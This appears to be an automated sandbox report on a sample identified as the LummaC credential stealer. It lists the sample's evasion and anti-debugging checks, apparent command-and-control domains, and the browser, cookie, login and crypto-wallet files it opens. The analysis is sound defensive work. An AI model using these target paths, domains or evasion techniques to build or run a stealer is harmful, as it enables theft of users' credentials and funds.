                Source: hx0wBsOjkQ.exe, 00000000.00000003.1541269769.0000000005812000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696501413
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1541269769.0000000005812000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
                Source: hx0wBsOjkQ.exe, 00000000.00000002.1673690974.0000000000DB8000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1672420814.0000000000DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1541269769.0000000005812000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696501413x
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1541269769.0000000005812000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413}
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1541269769.0000000005812000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1541269769.0000000005812000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413x
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1541269769.0000000005812000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696501413t
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1541269769.0000000005812000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - HKVMware20,11696501413]
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1541269769.0000000005812000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696501413s
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1541269769.0000000005812000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1541028057.000000000581F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696501413p
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1541269769.0000000005812000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696501413u
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1541269769.0000000005812000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1541269769.0000000005812000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU WestVMware20,11696501413n
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1541269769.0000000005812000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696501413
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1541269769.0000000005812000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1541269769.0000000005812000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.comVMware20,11696501413}
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1541269769.0000000005812000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactiveuserers.co.inVMware20,11696501413d
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1541269769.0000000005812000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696501413x
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1541269769.0000000005812000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696501413
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1541269769.0000000005812000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696501413t
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1541269769.0000000005812000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
                Source: hx0wBsOjkQ.exe, 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1541269769.0000000005812000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactiveuserers.comVMware20,11696501413
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495301417.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1672776832.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1626918311.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1599230927.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495405618.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000002.1673742160.0000000000DE8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1541269769.0000000005812000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696501413f
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1541269769.0000000005812000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696501413
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: SICE
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_2_0041E110 LdrInitializeThunk,0_2_0041E110

                HIPS / PFW / Operating System Protection Evasion

                barindex
                LummaC encrypted strings found
                Source: hx0wBsOjkQ.exeString found in binary or memory: hummskitnj.buzz
                Source: hx0wBsOjkQ.exeString found in binary or memory: cashfuzysao.buzz
                Source: hx0wBsOjkQ.exeString found in binary or memory: appliacnesot.buzz
                Source: hx0wBsOjkQ.exeString found in binary or memory: screwamusresz.buzz
                Source: hx0wBsOjkQ.exeString found in binary or memory: inherineau.buzz
                Source: hx0wBsOjkQ.exeString found in binary or memory: scentniej.buzz
                Source: hx0wBsOjkQ.exeString found in binary or memory: rebuildeso.buzz
                Source: hx0wBsOjkQ.exeString found in binary or memory: prisonyfork.buzz
                Source: hx0wBsOjkQ.exeString found in binary or memory: mindhandru.buzz
                Source: hx0wBsOjkQ.exe, hx0wBsOjkQ.exe, 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: WProgram Manager
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1626918311.0000000000E0B000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000002.1673742160.0000000000DD2000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1672776832.0000000000DD2000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1672925313.0000000000E0B000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000002.1673817152.0000000000E0B000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1626918311.0000000000DD2000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1626918311.0000000000DF3000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1626755261.0000000000E72000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: Process Memory Space: hx0wBsOjkQ.exe PID: 8048, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Found many strings related to Crypto-Wallets (likely being stolen)
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1627174690.0000000000E20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1627174690.0000000000E20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1627174690.0000000000E20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1627174690.0000000000E20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ppdata%\\com.liberty.jaxx\\IndexedDB","m":["*"],"z":"Wallets/JAXX New Versio
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1627174690.0000000000E20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: :"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exod
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1627174690.0000000000E20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1627174690.0000000000E20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1599170541.0000000000E5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1599170541.0000000000E5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
